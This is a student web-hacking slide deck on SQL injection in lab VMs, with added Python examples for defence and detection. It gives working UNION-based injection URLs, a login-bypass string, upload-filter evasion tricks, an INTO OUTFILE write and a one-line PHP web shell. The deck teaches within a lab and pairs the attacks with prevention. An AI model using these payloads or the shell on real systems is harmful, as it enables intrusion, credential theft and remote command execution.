web hacking series part 3

~ Aditya Kamat BMS College of Engineering WEB HACKING SERIES PART-3


Post on 08-Apr-2017

Page 1: Web hacking series part 3

~ Aditya Kamat

BMS College of Engineering

WEB HACKING SERIES PART-3

Page 2: Web hacking series part 3

TOPICS LEARNT TILL NOW:-

• Basics of web and a little about networks.

• HTML injection.

• SQL injection to bypass authentication.

• Buffer overflow attack.

Page 3: Web hacking series part 3

CONT…

• Bypass Authentication Via Authentication Token Manipulation.

• Session hijacking.

• Brute forcing login pages using burp.

• HTTP parameter pollution.

Page 4: Web hacking series part 3

WHAT WILL BE COVERED TODAY:-

• SQL injection (SQLi).

• Uploading a shell and gaining remote code execution capabilities on the server.

• And the prevention of course.

Page 5: Web hacking series part 3

WHAT IS SQL??

• Structured Query Language (SQL) is the language used to interact with a relational database.

• We ask questions in the form of queries, and the answers are known as the results.

• Its syntax is simple and close to natural language (English).

Page 6: Web hacking series part 3

BASIC OPERATIONS ON A DATABASE:-

• Create: Insert data into a database.

• Read: Read data from a table in a database.

• Update: Update some information present in a database.

• Delete: Delete information from a database.

Page 7: Web hacking series part 3

IMPORTANT SQL COMMANDS:-

Source: w3schools.org

Page 8: Web hacking series part 3

LET’S HAVE A LOOK AT AN EXAMPLE QUERY:-

• select * from colleges;

• This assumes a table named "colleges" exists.

• The result of the query is every row of the table.

• We can add a constraint with the keyword 'where'. Example: select * from colleges where name='bmsce'; This selects the rows whose name column equals 'bmsce'.

Page 9: Web hacking series part 3

STEPS FOR INJECTION:-

• Search for a vulnerable point (injection point).

• Identify the database engine in use.

• Inject queries to dump required data.

Page 10: Web hacking series part 3

WHAT SHOULD WE FOCUS ON?

• A typical query used by websites to check a user's username and password: select username,password from users where username='x' and password='y';

• If the query returns one or more rows, the user is treated as authenticated.

• To become the authenticated user without knowing the password, we bypass the password check with ' or 1=1--

• The leading ' closes the password string literal, or 1=1 makes the where clause always true, and -- comments out the rest of the query, so the user is authenticated.
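The login check above, as an added example that is not part of the deck: a vulnerable version that concatenates the two fields into the SQL text (the page 10 query) beside the prepared-statement version recommended on the prevention page. The in-memory SQLite table, the two accounts and their passwords are constructed for the demo; passwords are kept in plaintext only to mirror the slide's query.

```python
import sqlite3

# Constructed in-memory stand-in for the deck's "users" table. The accounts
# and passwords are sample values, not data from the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def build_query_vulnerable(username, password):
    # The page 10 query built by string concatenation: whatever the user types
    # becomes part of the SQL text, quotes and comment markers included.
    return ("SELECT username, password FROM users WHERE username='"
            + username + "' AND password='" + password + "'")


def login_vulnerable(conn, username, password):
    """Return the sorted usernames the concatenated query matches.

    A non-empty result is what the slide calls an authenticated user.
    """
    rows = conn.execute(build_query_vulnerable(username, password)).fetchall()
    return sorted(row[0] for row in rows)


def login_safe(conn, username, password):
    """Same check with a prepared statement: both values are bound as
    parameters, so the SQL structure is fixed before user input is seen."""
    rows = conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"      # the deck's bypass string, typed into the password field
    print(build_query_vulnerable("admin", payload))
    print("vulnerable:", login_vulnerable(db, "admin", payload))   # every user matches
    print("prepared:  ", login_safe(db, "admin", payload))         # nothing matches
```

With the payload in the password field the concatenated query becomes `... AND password='' or 1=1--'`, so the WHERE clause is true for every row; the parameterised query compares the literal string `' or 1=1--` against the stored password and matches nothing.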

Page 11: Web hacking series part 3

LET’S START OFF WITH A DEMO!

Page 12: Web hacking series part 3

EXAMPLE 1--

Page 13: Web hacking series part 3

STEP 1:

• Check if the site is vulnerable by adding a single quote at the end.

• http://192.168.56.100/cat.php?id=1'

Page 14: Web hacking series part 3

STEP 2:

• Check the number of columns present in the table used by the web page.

• http://192.168.56.100/cat.php?id=1 order by 1

• http://192.168.56.100/cat.php?id=1 order by 2

• http://192.168.56.100/cat.php?id=1 order by 3

• http://192.168.56.100/cat.php?id=1 order by 4

• http://192.168.56.100/cat.php?id=1 order by 5 (We get an error here).

Page 15: Web hacking series part 3

STEP 3:

• Find out the vulnerable column which can be used to dump the data.

• http://192.168.56.100/cat.php?id=-1 union select 1,2,3,4

• The union operator combines the results of several select queries and also removes duplicate rows.

• Because id=-1 matches no real row, the page renders the row produced by our select; the number that appears on the page tells us which column's content is displayed and can therefore be used to dump data.

Page 16: Web hacking series part 3

STEP 4 (NOT NECESSARY):

• http://192.168.56.100/cat.php?id=-1 union select 1,@@version,3,4

• @@version returns a string that indicates the MySQL server version.

• @@database returns the default (current) database name.

• @@user returns the user name and host name supplied by the client.

Page 17: Web hacking series part 3

STEP 5:

• http://192.168.56.100/cat.php?id=-1 union select 1,table_name,3,4 from information_schema.tables

• This retrieves all the tables present in the database.

• information_schema.tables lists the names of all the tables present.

Page 18: Web hacking series part 3

STEP 6:

• http://192.168.56.100/cat.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name='users'

• From the previous query's output we choose the right table, and this query lists all the columns present in it. Here we have chosen the table 'users'.

Page 19: Web hacking series part 3

STEP 7:

• http://192.168.56.100/cat.php?id=-1 union select 1,concat(id,0x3a,login,0x3a,password),3,4 from users

• This dumps the data present in the users table. We need to specify the names of the columns from which the data is to be dumped.

• 0x3a is the hex equivalent of ':'. It is used to separate the values from each column.
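Seen from the server side, every stage of steps 1 to 7 (and the INTO OUTFILE variant used later for DVWA) leaves a recognisable request in the web server's access log. The following added example, not from the deck, runs a small set of signature rules over constructed combined-format log lines; the IP addresses, timestamps and request targets are made up to resemble the deck's URLs, and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Rules for the probe and extraction stages of the walkthrough. Each one is
# applied to the URL-decoded request target. Names are this example's own.
RULES = [
    ("quote-probe",   re.compile(r"[?&]\w+=\d*'")),                      # id=1'  or  id='
    ("order-by-enum", re.compile(r"\border\s+by\s+\d+", re.I)),           # column counting
    ("union-select",  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-read",   re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("file-write",    re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),  # INTO OUTFILE
]

# client_ip, ident, user, [timestamp], "METHOD target HTTP/x"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample lines (not real traffic) in Apache/nginx combined format.
LOG_LINES = [
    '192.168.56.1 - - [08/Apr/2017:10:00:01 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 512',
    '192.168.56.1 - - [08/Apr/2017:10:00:05 +0000] "GET /cat.php?id=1%27 HTTP/1.1" 500 231',
    '192.168.56.1 - - [08/Apr/2017:10:00:09 +0000] "GET /cat.php?id=1%20order%20by%205 HTTP/1.1" 500 231',
    '192.168.56.1 - - [08/Apr/2017:10:00:14 +0000] "GET /cat.php?id=-1%20union%20select%201,table_name,3,4%20from%20information_schema.tables HTTP/1.1" 200 2048',
    '192.168.56.1 - - [08/Apr/2017:10:00:20 +0000] "GET /vulnerabilities/sqli/?id=%27%20union%20select%201,2%20INTO%20OUTFILE%20%22C:%5C%5Cxampp%5C%5Chtdocs%5C%5Ctext.php%22--+&Submit=Submit HTTP/1.1" 200 77',
    '10.0.0.7 - - [08/Apr/2017:10:01:00 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 900',
]


def classify(request_target):
    """Return the names of every rule matching the URL-decoded request target."""
    decoded = unquote_plus(request_target)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(lines):
    """Parse combined-format lines; return (client_ip, decoded_target, rule_names)
    for each line that trips at least one rule, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a request line we understand
        ip, target = m.groups()
        names = classify(target)
        if names:
            hits.append((ip, unquote_plus(target), names))
    return hits


if __name__ == "__main__":
    for ip, target, names in scan(LOG_LINES):
        print(f"{ip}  {', '.join(names):30}  {target}")
```

Decoding before matching matters: the probe quote arrives as `%27` and the keywords are separated by `%20` or `+`, so rules applied to the raw line would miss them. The last sample line ("order form") shows why the rules require the full keyword shape rather than a bare word.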

Page 20: Web hacking series part 3

WHAT NEXT??

• We need to crack the password hash we obtained and use it to log in as admin.

• The password is stored as an MD5 hash; it can be recovered as 'P4ssw0rd' using some online lookup services.

• Upload a shell and gain access to the web server.

Page 21: Web hacking series part 3

UPLOADING A SHELL:

• After gaining admin access, try finding a page which allows uploading of images/documents (/admin/new.php in our case).

• Upload our simple php script to be able to pass system commands in the url.

• Some websites don't allow you to upload a php file directly. Try changing the extension to one of these: "Php, php3, pHp, phP, php.test".

• If none of these work, use Tamper Data to change the extension.

• Last hope is to encode the php script into an image using exiftool and then upload the image.

Page 22: Web hacking series part 3

EXAMPLE 2(DVWA)

Page 23: Web hacking series part 3

LET US TRY OUT THE SAME STEPS HERE TOO!

• Try out steps 1 to 7 which were done in the previous example.

Page 24: Web hacking series part 3

NEW WAY TO UPLOAD A SHELL:-

• Using "INTO OUTFILE", we can redirect a stream of text to a file.

• The query we will use: http://192.168.56.100/hacks/DVWA-master/vulnerabilities/sqli/?id=' union select unhex(hex("hi")),2 INTO OUTFILE "C:\\xampp\\htdocs\\hacks\\DVWA-master\\text.php"--+&Submit=Submit#

Page 25: Web hacking series part 3

CONTD…

• In this way, we can write the php code we used in the previous example into the file and then execute system commands through it:

<?php

system($_GET['cmd']);

?>

Page 26: Web hacking series part 3

DONE!!!

SRC: null-byte.wonderhowto.com

Page 27: Web hacking series part 3

PREVENTION:-

• Validate all user supplied input.

• Use prepared statements.

• Review code for all possible injection points.

• Store important information in the form of salt+hash in the database.

Ref: https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet
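The "salt+hash" bullet above is what would have stopped the page 20 step, where an unsalted MD5 digest was turned back into 'P4ssw0rd' by a lookup service. The following added example, not from the deck, contrasts that storage with a per-user random salt and PBKDF2-HMAC-SHA256 from Python's standard library; the record format `algorithm$iterations$salt$digest` and the iteration count are choices made for this demo.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # work factor chosen for this demo; raise it as hardware gets faster


def md5_store(password):
    """What the deck's target did: an unsalted MD5 digest.

    The same password always yields the same digest, so a precomputed
    lookup table (the 'online services' of page 20) recovers it.
    """
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def salted_store(password, salt=None):
    """Return a self-describing record: algorithm$iterations$salt$digest.

    A fresh random salt per user means two users with the same password get
    different records, so no shared lookup table applies.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def salted_verify(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        iterations = int(iterations)
    except ValueError:
        return False                      # malformed record: treat as no match
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    pw = "P4ssw0rd"                         # the password recovered on page 20
    print("md5   :", md5_store(pw), "(identical every time)")
    rec1, rec2 = salted_store(pw), salted_store(pw)
    print("salted:", rec1)
    print("salted:", rec2, "(different salt, different record)")
    print("verify:", salted_verify(pw, rec1), salted_verify("wrong", rec1))
```

Storing the salt and iteration count inside the record lets the work factor be raised later without a schema change, and `hmac.compare_digest` avoids leaking how many leading bytes of the digest matched.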

Page 28: Web hacking series part 3

CONT…

• Use a web application firewall.

• Run RIPS scanner on PHP code.

• Manage database access accounts with the least privileges the application needs.

Page 29: Web hacking series part 3

ADDITIONAL RESOURCES:-

• Try out more php shells at: r57shell.net

• SQL injection tutorials at:

https://www.youtube.com/watch?v=_Y8A-1GAUiY&list=PLMA3sO-IlLtuREVEaRX0s8d2WeUM0E4bE

http://www.sqlinjection.net/

• Practice at: hackthissite.org

• Practice VM : https://pentesterlab.com/exercises/from_sqli_to_shell/iso

• DVWA: http://www.dvwa.co.uk/

Page 30: Web hacking series part 3

THANK YOU